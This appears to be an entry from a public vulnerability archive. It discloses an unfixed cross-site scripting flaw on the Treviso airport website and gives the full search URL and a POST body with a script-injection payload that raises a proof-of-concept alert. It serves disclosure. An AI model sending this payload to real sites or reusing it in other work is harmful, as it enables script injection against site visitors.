Security researcher Langy, has submitted on 17/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.trevisoairport.it, which at the time of submission ranked 645304 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 17/09/2007 |
Date published: 20/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Langy |
Domain: www.trevisoairport.it |
Category: XSS |
Pagerank: 645304 |
URL: http://www.trevisoairport.it/tsfpage/search/searchResults.jsp?_DARGS=/save/search/searchForm.jsp |
POST: _dyncharset=UTF-8&%2Fcom%2Fetree%2Fsearch%2FRicercaWithLingua.successURL=%2Ftsfpage%2Fsearch%2Fsearc hResults.jsp&_D%3A%2Fcom%2Fetree%2Fsearch%2FRicercaWithLingua.successURL=+&%2Fcom%2Fetree%2Fsearch%2 FRicercaWithLingua.language=it&_D%3A%2Fcom%2Fetree%2Fsearch%2FRicercaWithLingua.language=+&%2Fcom%2F etree%2Fsearch%2FRicercaWithLingua.airport=TSF&_D%3A%2Fcom%2Fetree%2Fsearch%2FRicercaWithLingua.airp ort=+&testo=%22%3E%3Cscript%3Ealert%28%27xssed+by+Langy+-+Googlebig.com%27%29%3B%3C%2Fscript%3E&_D%3 Atesto=+&_DARGS=%2Fsave%2Fsearch%2FsearchForm.jsp&x=14&y=8 |
Click here to view the mirror
|
|
|